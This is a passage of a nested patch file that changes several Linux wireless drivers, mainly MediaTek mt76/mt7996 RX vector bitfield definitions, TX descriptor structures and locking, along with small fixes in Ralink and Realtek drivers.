+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/usb.c b/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
+index 5321d20dcdcbf..363a170efdda9 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
+@@ -270,7 +270,7 @@ static int mt7921u_probe(struct usb_interface *usb_intf,
+ 
+ 	ret = mt7921u_dma_init(dev, false);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	hw = mt76_hw(dev);
+ 	/* check hw sg support in order to enable AMSDU */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.h b/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.h
+index 8da599e0abeac..cfc48698539b3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/eeprom.h
+@@ -31,11 +31,11 @@ enum mt7996_eeprom_field {
+ #define MT_EE_WIFI_CONF2_BAND_SEL		GENMASK(2, 0)
+ 
+ #define MT_EE_WIFI_CONF1_TX_PATH_BAND0		GENMASK(5, 3)
+-#define MT_EE_WIFI_CONF2_TX_PATH_BAND1		GENMASK(5, 3)
+-#define MT_EE_WIFI_CONF2_TX_PATH_BAND2		GENMASK(2, 0)
++#define MT_EE_WIFI_CONF2_TX_PATH_BAND1		GENMASK(2, 0)
++#define MT_EE_WIFI_CONF2_TX_PATH_BAND2		GENMASK(5, 3)
+ #define MT_EE_WIFI_CONF4_STREAM_NUM_BAND0	GENMASK(5, 3)
+-#define MT_EE_WIFI_CONF5_STREAM_NUM_BAND1	GENMASK(5, 3)
+-#define MT_EE_WIFI_CONF5_STREAM_NUM_BAND2	GENMASK(2, 0)
++#define MT_EE_WIFI_CONF5_STREAM_NUM_BAND1	GENMASK(2, 0)
++#define MT_EE_WIFI_CONF5_STREAM_NUM_BAND2	GENMASK(5, 3)
+ 
+ #define MT_EE_RATE_DELTA_MASK			GENMASK(5, 0)
+ #define MT_EE_RATE_DELTA_SIGN			BIT(6)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mac.c b/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
+index 0eb9e4d73f2c1..e643a27048f93 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mac.c
+@@ -253,12 +253,9 @@ mt7996_mac_decode_he_radiotap_ru(struct mt76_rx_status *status,
+ 				 struct ieee80211_radiotap_he *he,
+ 				 __le32 *rxv)
+ {
+-	u32 ru_h, ru_l;
+-	u8 ru, offs = 0;
++	u32 ru, offs = 0;
+ 
+-	ru_l = le32_get_bits(rxv[0], MT_PRXV_HE_RU_ALLOC_L);
+-	ru_h = le32_get_bits(rxv[1], MT_PRXV_HE_RU_ALLOC_H);
+-	ru = (u8)(ru_l | ru_h << 4);
++	ru = le32_get_bits(rxv[0], MT_PRXV_HE_RU_ALLOC);
+ 
+ 	status->bw = RATE_INFO_BW_HE_RU;
+ 
+@@ -323,18 +320,23 @@ mt7996_mac_decode_he_mu_radiotap(struct sk_buff *skb, __le32 *rxv)
+ 
+ 	he_mu->flags2 |= MU_PREP(FLAGS2_BW_FROM_SIG_A_BW, status->bw) |
+ 			 MU_PREP(FLAGS2_SIG_B_SYMS_USERS,
+-				 le32_get_bits(rxv[2], MT_CRXV_HE_NUM_USER));
++				 le32_get_bits(rxv[4], MT_CRXV_HE_NUM_USER));
+ 
+-	he_mu->ru_ch1[0] = le32_get_bits(rxv[3], MT_CRXV_HE_RU0);
++	he_mu->ru_ch1[0] = le32_get_bits(rxv[16], MT_CRXV_HE_RU0) & 0xff;
+ 
+ 	if (status->bw >= RATE_INFO_BW_40) {
+ 		he_mu->flags1 |= HE_BITS(MU_FLAGS1_CH2_RU_KNOWN);
+-		he_mu->ru_ch2[0] = le32_get_bits(rxv[3], MT_CRXV_HE_RU1);
++		he_mu->ru_ch2[0] = le32_get_bits(rxv[16], MT_CRXV_HE_RU1) & 0xff;
+ 	}
+ 
+ 	if (status->bw >= RATE_INFO_BW_80) {
+-		he_mu->ru_ch1[1] = le32_get_bits(rxv[3], MT_CRXV_HE_RU2);
+-		he_mu->ru_ch2[1] = le32_get_bits(rxv[3], MT_CRXV_HE_RU3);
++		u32 ru_h, ru_l;
++
++		he_mu->ru_ch1[1] = le32_get_bits(rxv[16], MT_CRXV_HE_RU2) & 0xff;
++
++		ru_l = le32_get_bits(rxv[16], MT_CRXV_HE_RU3_L);
++		ru_h = le32_get_bits(rxv[17], MT_CRXV_HE_RU3_H) & 0x7;
++		he_mu->ru_ch2[1] = (u8)(ru_l | ru_h << 4);
+ 	}
+ }
+ 
+@@ -357,23 +359,23 @@ mt7996_mac_decode_he_radiotap(struct sk_buff *skb, __le32 *rxv, u8 mode)
+ 			 HE_BITS(DATA2_TXOP_KNOWN),
+ 	};
+ 	struct ieee80211_radiotap_he *he = NULL;
+-	u32 ltf_size = le32_get_bits(rxv[2], MT_CRXV_HE_LTF_SIZE) + 1;
++	u32 ltf_size = le32_get_bits(rxv[4], MT_CRXV_HE_LTF_SIZE) + 1;
+ 
+ 	status->flag |= RX_FLAG_RADIOTAP_HE;
+ 
+ 	he = skb_push(skb, sizeof(known));
+ 	memcpy(he, &known, sizeof(known));
+ 
+-	he->data3 = HE_PREP(DATA3_BSS_COLOR, BSS_COLOR, rxv[14]) |
+-		    HE_PREP(DATA3_LDPC_XSYMSEG, LDPC_EXT_SYM, rxv[2]);
+-	he->data4 = HE_PREP(DATA4_SU_MU_SPTL_REUSE, SR_MASK, rxv[11]);
+-	he->data5 = HE_PREP(DATA5_PE_DISAMBIG, PE_DISAMBIG, rxv[2]) |
++	he->data3 = HE_PREP(DATA3_BSS_COLOR, BSS_COLOR, rxv[9]) |
++		    HE_PREP(DATA3_LDPC_XSYMSEG, LDPC_EXT_SYM, rxv[4]);
++	he->data4 = HE_PREP(DATA4_SU_MU_SPTL_REUSE, SR_MASK, rxv[13]);
++	he->data5 = HE_PREP(DATA5_PE_DISAMBIG, PE_DISAMBIG, rxv[5]) |
+ 		    le16_encode_bits(ltf_size,
+ 				     IEEE80211_RADIOTAP_HE_DATA5_LTF_SIZE);
+ 	if (le32_to_cpu(rxv[0]) & MT_PRXV_TXBF)
+ 		he->data5 |= HE_BITS(DATA5_TXBF);
+-	he->data6 = HE_PREP(DATA6_TXOP, TXOP_DUR, rxv[14]) |
+-		    HE_PREP(DATA6_DOPPLER, DOPPLER, rxv[14]);
++	he->data6 = HE_PREP(DATA6_TXOP, TXOP_DUR, rxv[9]) |
++		    HE_PREP(DATA6_DOPPLER, DOPPLER, rxv[9]);
+ 
+ 	switch (mode) {
+ 	case MT_PHY_TYPE_HE_SU:
+@@ -382,22 +384,22 @@ mt7996_mac_decode_he_radiotap(struct sk_buff *skb, __le32 *rxv, u8 mode)
+ 			     HE_BITS(DATA1_BEAM_CHANGE_KNOWN) |
+ 			     HE_BITS(DATA1_BW_RU_ALLOC_KNOWN);
+ 
+-		he->data3 |= HE_PREP(DATA3_BEAM_CHANGE, BEAM_CHNG, rxv[14]) |
+-			     HE_PREP(DATA3_UL_DL, UPLINK, rxv[2]);
++		he->data3 |= HE_PREP(DATA3_BEAM_CHANGE, BEAM_CHNG, rxv[8]) |
++			     HE_PREP(DATA3_UL_DL, UPLINK, rxv[5]);
+ 		break;
+ 	case MT_PHY_TYPE_HE_EXT_SU:
+ 		he->data1 |= HE_BITS(DATA1_FORMAT_EXT_SU) |
+ 			     HE_BITS(DATA1_UL_DL_KNOWN) |
+ 			     HE_BITS(DATA1_BW_RU_ALLOC_KNOWN);
+ 
+-		he->data3 |= HE_PREP(DATA3_UL_DL, UPLINK, rxv[2]);
++		he->data3 |= HE_PREP(DATA3_UL_DL, UPLINK, rxv[5]);
+ 		break;
+ 	case MT_PHY_TYPE_HE_MU:
+ 		he->data1 |= HE_BITS(DATA1_FORMAT_MU) |
+ 			     HE_BITS(DATA1_UL_DL_KNOWN);
+ 
+-		he->data3 |= HE_PREP(DATA3_UL_DL, UPLINK, rxv[2]);
+-		he->data4 |= HE_PREP(DATA4_MU_STA_ID, MU_AID, rxv[7]);
++		he->data3 |= HE_PREP(DATA3_UL_DL, UPLINK, rxv[5]);
++		he->data4 |= HE_PREP(DATA4_MU_STA_ID, MU_AID, rxv[8]);
+ 
+ 		mt7996_mac_decode_he_radiotap_ru(status, he, rxv);
+ 		mt7996_mac_decode_he_mu_radiotap(skb, rxv);
+@@ -408,10 +410,10 @@ mt7996_mac_decode_he_radiotap(struct sk_buff *skb, __le32 *rxv, u8 mode)
+ 			     HE_BITS(DATA1_SPTL_REUSE3_KNOWN) |
+ 			     HE_BITS(DATA1_SPTL_REUSE4_KNOWN);
+ 
+-		he->data4 |= HE_PREP(DATA4_TB_SPTL_REUSE1, SR_MASK, rxv[11]) |
+-			     HE_PREP(DATA4_TB_SPTL_REUSE2, SR1_MASK, rxv[11]) |
+-			     HE_PREP(DATA4_TB_SPTL_REUSE3, SR2_MASK, rxv[11]) |
+-			     HE_PREP(DATA4_TB_SPTL_REUSE4, SR3_MASK, rxv[11]);
++		he->data4 |= HE_PREP(DATA4_TB_SPTL_REUSE1, SR_MASK, rxv[13]) |
++			     HE_PREP(DATA4_TB_SPTL_REUSE2, SR1_MASK, rxv[13]) |
++			     HE_PREP(DATA4_TB_SPTL_REUSE3, SR2_MASK, rxv[13]) |
++			     HE_PREP(DATA4_TB_SPTL_REUSE4, SR3_MASK, rxv[13]);
+ 
+ 		mt7996_mac_decode_he_radiotap_ru(status, he, rxv);
+ 		break;
+@@ -960,8 +962,9 @@ mt7996_mac_write_txwi_80211(struct mt7996_dev *dev, __le32 *txwi,
+ }
+ 
+ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+-			   struct sk_buff *skb, struct mt76_wcid *wcid, int pid,
+-			   struct ieee80211_key_conf *key, u32 changed)
++			   struct sk_buff *skb, struct mt76_wcid *wcid,
++			   struct ieee80211_key_conf *key, int pid,
++			   enum mt76_txq_id qid, u32 changed)
+ {
+ 	struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb);
+ 	struct ieee80211_vif *vif = info->control.vif;
+@@ -992,7 +995,7 @@ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+ 	} else if (beacon) {
+ 		p_fmt = MT_TX_TYPE_FW;
+ 		q_idx = MT_LMAC_BCN0;
+-	} else if (skb_get_queue_mapping(skb) >= MT_TXQ_PSD) {
++	} else if (qid >= MT_TXQ_PSD) {
+ 		p_fmt = MT_TX_TYPE_CT;
+ 		q_idx = MT_LMAC_ALTX0;
+ 	} else {
+@@ -1069,8 +1072,8 @@ int mt7996_tx_prepare_skb(struct mt76_dev *mdev, void *txwi_ptr,
+ 	struct ieee80211_tx_info *info = IEEE80211_SKB_CB(tx_info->skb);
+ 	struct ieee80211_key_conf *key = info->control.hw_key;
+ 	struct ieee80211_vif *vif = info->control.vif;
++	struct mt76_connac_txp_common *txp;
+ 	struct mt76_txwi_cache *t;
+-	struct mt7996_txp *txp;
+ 	int id, i, pid, nbuf = tx_info->nbuf - 1;
+ 	bool is_8023 = info->flags & IEEE80211_TX_CTL_HW_80211_ENCAP;
+ 	u8 *txwi = (u8 *)txwi_ptr;
+@@ -1098,41 +1101,36 @@ int mt7996_tx_prepare_skb(struct mt76_dev *mdev, void *txwi_ptr,
+ 		return id;
+ 
+ 	pid = mt76_tx_status_skb_add(mdev, wcid, tx_info->skb);
+-	memset(txwi_ptr, 0, MT_TXD_SIZE);
+-	/* Transmit non qos data by 802.11 header and need to fill txd by host*/
+-	if (!is_8023 || pid >= MT_PACKET_ID_FIRST)
+-		mt7996_mac_write_txwi(dev, txwi_ptr, tx_info->skb, wcid, pid,
+-				      key, 0);
++	mt7996_mac_write_txwi(dev, txwi_ptr, tx_info->skb, wcid, key,
++			      pid, qid, 0);
+ 
+-	txp = (struct mt7996_txp *)(txwi + MT_TXD_SIZE);
++	txp = (struct mt76_connac_txp_common *)(txwi + MT_TXD_SIZE);
+ 	for (i = 0; i < nbuf; i++) {
+-		txp->buf[i] = cpu_to_le32(tx_info->buf[i + 1].addr);
+-		txp->len[i] = cpu_to_le16(tx_info->buf[i + 1].len);
++		txp->fw.buf[i] = cpu_to_le32(tx_info->buf[i + 1].addr);
++		txp->fw.len[i] = cpu_to_le16(tx_info->buf[i + 1].len);
+ 	}
+-	txp->nbuf = nbuf;
+-
+-	txp->flags = cpu_to_le16(MT_CT_INFO_FROM_HOST);
++	txp->fw.nbuf = nbuf;
+ 
+-	if (!is_8023 || pid >= MT_PACKET_ID_FIRST)
+-		txp->flags |= cpu_to_le16(MT_CT_INFO_APPLY_TXD);
++	txp->fw.flags =
++		cpu_to_le16(MT_CT_INFO_FROM_HOST | MT_CT_INFO_APPLY_TXD);
+ 
+ 	if (!key)
+-		txp->flags |= cpu_to_le16(MT_CT_INFO_NONE_CIPHER_FRAME);
++		txp->fw.flags |= cpu_to_le16(MT_CT_INFO_NONE_CIPHER_FRAME);
+ 
+ 	if (!is_8023 && ieee80211_is_mgmt(hdr->frame_control))
+-		txp->flags |= cpu_to_le16(MT_CT_INFO_MGMT_FRAME);
++		txp->fw.flags |= cpu_to_le16(MT_CT_INFO_MGMT_FRAME);
+ 
+ 	if (vif) {
+ 		struct mt7996_vif *mvif = (struct mt7996_vif *)vif->drv_priv;
+ 
+-		txp->bss_idx = mvif->mt76.idx;
++		txp->fw.bss_idx = mvif->mt76.idx;
+ 	}
+ 
+-	txp->token = cpu_to_le16(id);
++	txp->fw.token = cpu_to_le16(id);
+ 	if (test_bit(MT_WCID_FLAG_4ADDR, &wcid->flags))
+-		txp->rept_wds_wcid = cpu_to_le16(wcid->idx);
++		txp->fw.rept_wds_wcid = cpu_to_le16(wcid->idx);
+ 	else
+-		txp->rept_wds_wcid = cpu_to_le16(0xfff);
++		txp->fw.rept_wds_wcid = cpu_to_le16(0xfff);
+ 	tx_info->skb = DMA_DUMMY_DATA;
+ 
+ 	/* pass partial skb header to fw */
+@@ -1171,13 +1169,13 @@ mt7996_tx_check_aggr(struct ieee80211_sta *sta, __le32 *txwi)
+ static void
+ mt7996_txp_skb_unmap(struct mt76_dev *dev, struct mt76_txwi_cache *t)
+ {
+-	struct mt7996_txp *txp;
++	struct mt76_connac_txp_common *txp;
+ 	int i;
+ 
+ 	txp = mt7996_txwi_to_txp(dev, t);
+-	for (i = 0; i < txp->nbuf; i++)
+-		dma_unmap_single(dev->dev, le32_to_cpu(txp->buf[i]),
+-				 le16_to_cpu(txp->len[i]), DMA_TO_DEVICE);
++	for (i = 0; i < txp->fw.nbuf; i++)
++		dma_unmap_single(dev->dev, le32_to_cpu(txp->fw.buf[i]),
++				 le16_to_cpu(txp->fw.len[i]), DMA_TO_DEVICE);
+ }
+ 
+ static void
+@@ -1554,11 +1552,11 @@ void mt7996_tx_complete_skb(struct mt76_dev *mdev, struct mt76_queue_entry *e)
+ 
+ 	/* error path */
+ 	if (e->skb == DMA_DUMMY_DATA) {
++		struct mt76_connac_txp_common *txp;
+ 		struct mt76_txwi_cache *t;
+-		struct mt7996_txp *txp;
+ 
+ 		txp = mt7996_txwi_to_txp(mdev, e->txwi);
+-		t = mt76_token_put(mdev, le16_to_cpu(txp->token));
++		t = mt76_token_put(mdev, le16_to_cpu(txp->fw.token));
+ 		e->skb = t ? t->skb : NULL;
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mac.h b/drivers/net/wireless/mediatek/mt76/mt7996/mac.h
+index 9f68852012b9e..1404ded52104a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mac.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mac.h
+@@ -102,8 +102,7 @@ enum rx_pkt_type {
+ #define MT_PRXV_NSTS			GENMASK(10, 7)
+ #define MT_PRXV_TXBF			BIT(11)
+ #define MT_PRXV_HT_AD_CODE		BIT(12)
+-#define MT_PRXV_HE_RU_ALLOC_L		GENMASK(31, 28)
+-#define MT_PRXV_HE_RU_ALLOC_H		GENMASK(3, 0)
++#define MT_PRXV_HE_RU_ALLOC		GENMASK(30, 22)
+ #define MT_PRXV_RCPI3			GENMASK(31, 24)
+ #define MT_PRXV_RCPI2			GENMASK(23, 16)
+ #define MT_PRXV_RCPI1			GENMASK(15, 8)
+@@ -113,34 +112,32 @@ enum rx_pkt_type {
+ #define MT_PRXV_TX_MODE			GENMASK(14, 11)
+ #define MT_PRXV_FRAME_MODE		GENMASK(2, 0)
+ #define MT_PRXV_DCM			BIT(5)
+-#define MT_PRXV_NUM_RX			BIT(8, 6)
+ 
+ /* C-RXV */
+-#define MT_CRXV_HT_STBC			GENMASK(1, 0)
+-#define MT_CRXV_TX_MODE			GENMASK(7, 4)
+-#define MT_CRXV_FRAME_MODE		GENMASK(10, 8)
+-#define MT_CRXV_HT_SHORT_GI		GENMASK(14, 13)
+-#define MT_CRXV_HE_LTF_SIZE		GENMASK(18, 17)
+-#define MT_CRXV_HE_LDPC_EXT_SYM		BIT(20)
+-#define MT_CRXV_HE_PE_DISAMBIG		BIT(23)
+-#define MT_CRXV_HE_NUM_USER		GENMASK(30, 24)
+-#define MT_CRXV_HE_UPLINK		BIT(31)
+-#define MT_CRXV_HE_RU0			GENMASK(7, 0)
+-#define MT_CRXV_HE_RU1			GENMASK(15, 8)
+-#define MT_CRXV_HE_RU2			GENMASK(23, 16)
+-#define MT_CRXV_HE_RU3			GENMASK(31, 24)
+-
+-#define MT_CRXV_HE_MU_AID		GENMASK(30, 20)
++#define MT_CRXV_HE_NUM_USER		GENMASK(26, 20)
++#define MT_CRXV_HE_LTF_SIZE		GENMASK(28, 27)
++#define MT_CRXV_HE_LDPC_EXT_SYM		BIT(30)
++
++#define MT_CRXV_HE_PE_DISAMBIG		BIT(1)
++#define MT_CRXV_HE_UPLINK		BIT(2)
++
++#define MT_CRXV_HE_MU_AID		GENMASK(27, 17)
++#define MT_CRXV_HE_BEAM_CHNG		BIT(29)
++
++#define MT_CRXV_HE_DOPPLER		BIT(0)
++#define MT_CRXV_HE_BSS_COLOR		GENMASK(15, 10)
++#define MT_CRXV_HE_TXOP_DUR		GENMASK(19, 17)
+ 
+ #define MT_CRXV_HE_SR_MASK		GENMASK(11, 8)
+ #define MT_CRXV_HE_SR1_MASK		GENMASK(16, 12)
+ #define MT_CRXV_HE_SR2_MASK             GENMASK(20, 17)
+ #define MT_CRXV_HE_SR3_MASK             GENMASK(24, 21)
+ 
+-#define MT_CRXV_HE_BSS_COLOR		GENMASK(5, 0)
+-#define MT_CRXV_HE_TXOP_DUR		GENMASK(12, 6)
+-#define MT_CRXV_HE_BEAM_CHNG		BIT(13)
+-#define MT_CRXV_HE_DOPPLER		BIT(16)
++#define MT_CRXV_HE_RU0			GENMASK(8, 0)
++#define MT_CRXV_HE_RU1			GENMASK(17, 9)
++#define MT_CRXV_HE_RU2			GENMASK(26, 18)
++#define MT_CRXV_HE_RU3_L		GENMASK(31, 27)
++#define MT_CRXV_HE_RU3_H		GENMASK(3, 0)
+ 
+ enum tx_header_format {
+ 	MT_HDR_FORMAT_802_3,
+@@ -268,17 +265,6 @@ enum tx_mgnt_type {
+ /* VHT/HE only use bits 0-3 */
+ #define MT_TX_RATE_IDX			GENMASK(5, 0)
+ 
+-struct mt7996_txp {
+-	__le16 flags;
+-	__le16 token;
+-	u8 bss_idx;
+-	__le16 rept_wds_wcid;
+-	u8 nbuf;
+-#define MT_TXP_MAX_BUF_NUM	6
+-	__le32 buf[MT_TXP_MAX_BUF_NUM];
+-	__le16 len[MT_TXP_MAX_BUF_NUM];
+-} __packed __aligned(4);
+-
+ #define MT_TXFREE0_PKT_TYPE		GENMASK(31, 27)
+ #define MT_TXFREE0_MSDU_CNT		GENMASK(25, 16)
+ #define MT_TXFREE0_RX_BYTE		GENMASK(15, 0)
+@@ -382,7 +368,7 @@ struct mt7996_dfs_radar_spec {
+ 	struct mt7996_dfs_pattern radar_pattern[16];
+ };
+ 
+-static inline struct mt7996_txp *
++static inline struct mt76_connac_txp_common *
+ mt7996_txwi_to_txp(struct mt76_dev *dev, struct mt76_txwi_cache *t)
+ {
+ 	u8 *txwi;
+@@ -392,7 +378,7 @@ mt7996_txwi_to_txp(struct mt76_dev *dev, struct mt76_txwi_cache *t)
+ 
+ 	txwi = mt76_get_txwi_ptr(dev, t);
+ 
+-	return (struct mt7996_txp *)(txwi + MT_TXD_SIZE);
++	return (struct mt76_connac_txp_common *)(txwi + MT_TXD_SIZE);
+ }
+ 
+ #endif
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
+index d593ed9e3f73c..c8c332ed8a402 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mcu.c
+@@ -421,7 +421,8 @@ mt7996_mcu_ie_countdown(struct mt7996_dev *dev, struct sk_buff *skb)
+ 	if (hdr->band && dev->mt76.phys[hdr->band])
+ 		mphy = dev->mt76.phys[hdr->band];
+ 
+-	tail = skb->data + le16_to_cpu(rxd->len);
++	tail = skb->data + skb->len;
++	data += sizeof(struct header);
+ 	while (data + sizeof(struct tlv) < tail && le16_to_cpu(tlv->len)) {
+ 		switch (le16_to_cpu(tlv->tag)) {
+ 		case UNI_EVENT_IE_COUNTDOWN_CSA:
+@@ -1804,8 +1805,9 @@ mt7996_mcu_beacon_cont(struct mt7996_dev *dev, struct ieee80211_vif *vif,
+ 	}
+ 
+ 	buf = (u8 *)bcn + sizeof(*bcn) - MAX_BEACON_SIZE;
+-	mt7996_mac_write_txwi(dev, (__le32 *)buf, skb, wcid, 0, NULL,
++	mt7996_mac_write_txwi(dev, (__le32 *)buf, skb, wcid, NULL, 0, 0,
+ 			      BSS_CHANGED_BEACON);
++
+ 	memcpy(buf + MT_TXD_SIZE, skb->data, skb->len);
+ }
+ 
+@@ -1995,8 +1997,7 @@ int mt7996_mcu_beacon_inband_discov(struct mt7996_dev *dev,
+ 
+ 	buf = (u8 *)tlv + sizeof(*discov) - MAX_INBAND_FRAME_SIZE;
+ 
+-	mt7996_mac_write_txwi(dev, (__le32 *)buf, skb, wcid, 0, NULL,
+-			      changed);
++	mt7996_mac_write_txwi(dev, (__le32 *)buf, skb, wcid, NULL, 0, 0, changed);
+ 
+ 	memcpy(buf + MT_TXD_SIZE, skb->data, skb->len);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c b/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
+index d8a2c1a744b25..2237f50adbc71 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
+@@ -318,7 +318,7 @@ struct mt7996_dev *mt7996_mmio_probe(struct device *pdev,
+ {
+ 	static const struct mt76_driver_ops drv_ops = {
+ 		/* txwi_size = txd size + txp size */
+-		.txwi_size = MT_TXD_SIZE + sizeof(struct mt7996_txp),
++		.txwi_size = MT_TXD_SIZE + sizeof(struct mt76_connac_fw_txp),
+ 		.drv_flags = MT_DRV_TXWI_NO_FREE |
+ 			     MT_DRV_HW_MGMT_TXQ,
+ 		.survey_flags = SURVEY_INFO_TIME_TX |
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mt7996.h b/drivers/net/wireless/mediatek/mt76/mt7996/mt7996.h
+index 725344791b4cd..e8eedae78479f 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mt7996.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mt7996.h
+@@ -472,8 +472,9 @@ void mt7996_mac_enable_nf(struct mt7996_dev *dev, u8 band);
+ void mt7996_mac_enable_rtscts(struct mt7996_dev *dev,
+ 			      struct ieee80211_vif *vif, bool enable);
+ void mt7996_mac_write_txwi(struct mt7996_dev *dev, __le32 *txwi,
+-			   struct sk_buff *skb, struct mt76_wcid *wcid, int pid,
+-			   struct ieee80211_key_conf *key, u32 changed);
++			   struct sk_buff *skb, struct mt76_wcid *wcid,
++			   struct ieee80211_key_conf *key, int pid,
++			   enum mt76_txq_id qid, u32 changed);
+ void mt7996_mac_set_timing(struct mt7996_phy *phy);
+ int mt7996_mac_sta_add(struct mt76_dev *mdev, struct ieee80211_vif *vif,
+ 		       struct ieee80211_sta *sta);
+diff --git a/drivers/net/wireless/mediatek/mt76/tx.c b/drivers/net/wireless/mediatek/mt76/tx.c
+index 1f309d05380ad..b435aed6aff7d 100644
+--- a/drivers/net/wireless/mediatek/mt76/tx.c
++++ b/drivers/net/wireless/mediatek/mt76/tx.c
+@@ -77,7 +77,9 @@ mt76_tx_status_unlock(struct mt76_dev *dev, struct sk_buff_head *list)
+ 		}
+ 
+ 		hw = mt76_tx_status_get_hw(dev, skb);
++		spin_lock_bh(&dev->rx_lock);
+ 		ieee80211_tx_status_ext(hw, &status);
++		spin_unlock_bh(&dev->rx_lock);
+ 	}
+ 	rcu_read_unlock();
+ }
+@@ -263,7 +265,9 @@ void __mt76_tx_complete_skb(struct mt76_dev *dev, u16 wcid_idx, struct sk_buff *
+ 	if (cb->pktid < MT_PACKET_ID_FIRST) {
+ 		hw = mt76_tx_status_get_hw(dev, skb);
+ 		status.sta = wcid_to_sta(wcid);
++		spin_lock_bh(&dev->rx_lock);
+ 		ieee80211_tx_status_ext(hw, &status);
++		spin_unlock_bh(&dev->rx_lock);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/util.c b/drivers/net/wireless/mediatek/mt76/util.c
+index 581964425468f..fc76c66ff1a5a 100644
+--- a/drivers/net/wireless/mediatek/mt76/util.c
++++ b/drivers/net/wireless/mediatek/mt76/util.c
+@@ -24,23 +24,23 @@ bool __mt76_poll(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+ }
+ EXPORT_SYMBOL_GPL(__mt76_poll);
+ 
+-bool __mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+-		      int timeout)
++bool ____mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
++			int timeout, int tick)
+ {
+ 	u32 cur;
+ 
+-	timeout /= 10;
++	timeout /= tick;
+ 	do {
+ 		cur = __mt76_rr(dev, offset) & mask;
+ 		if (cur == val)
+ 			return true;
+ 
+-		usleep_range(10000, 20000);
++		usleep_range(1000 * tick, 2000 * tick);
+ 	} while (timeout-- > 0);
+ 
+ 	return false;
+ }
+-EXPORT_SYMBOL_GPL(__mt76_poll_msec);
++EXPORT_SYMBOL_GPL(____mt76_poll_msec);
+ 
+ int mt76_wcid_alloc(u32 *mask, int size)
+ {
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+index 3a035afcf7f99..9a9cfd0ce402d 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+@@ -1091,6 +1091,7 @@ static void rt2x00lib_remove_hw(struct rt2x00_dev *rt2x00dev)
+ 	}
+ 
+ 	kfree(rt2x00dev->spec.channels_info);
++	kfree(rt2x00dev->chan_survey);
+ }
+ 
+ static const struct ieee80211_tpt_blink rt2x00_tpt_blink[] = {
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+index 9d0ed6760cb61..a0c61a39a969d 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+@@ -1801,6 +1801,7 @@ struct rtl8xxxu_fileops rtl8192eu_fops = {
+ 	.rx_desc_size = sizeof(struct rtl8xxxu_rxdesc24),
+ 	.has_s0s1 = 0,
+ 	.gen2_thermal_meter = 1,
++	.needs_full_init = 1,
+ 	.adda_1t_init = 0x0fc01616,
+ 	.adda_1t_path_on = 0x0fc01616,
+ 	.adda_2t_path_on_a = 0x0fc01616,
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index d22990464dad6..846bd268ffd94 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -1574,11 +1574,7 @@ rtl8xxxu_set_spec_sifs(struct rtl8xxxu_priv *priv, u16 cck, u16 ofdm)
+ static void rtl8xxxu_print_chipinfo(struct rtl8xxxu_priv *priv)
+ {
+ 	struct device *dev = &priv->udev->dev;
+-	char cut = '?';
+-
+-	/* Currently always true: chip_cut is 4 bits. */
+-	if (priv->chip_cut <= 15)
+-		cut = 'A' + priv->chip_cut;
++	char cut = 'A' + priv->chip_cut;
+ 
+ 	dev_info(dev,
+ 		 "RTL%s rev %c (%s) %iT%iR, TX queues %i, WiFi=%i, BT=%i, GPS=%i, HI PA=%i\n",
+diff --git a/drivers/net/wireless/realtek/rtlwifi/debug.c b/drivers/net/wireless/realtek/rtlwifi/debug.c
+index 0b1bc04cb6adb..9eb26dfe4ca92 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/debug.c
++++ b/drivers/net/wireless/realtek/rtlwifi/debug.c
+@@ -278,8 +278,8 @@ static ssize_t rtl_debugfs_set_write_reg(struct file *filp,
+ 
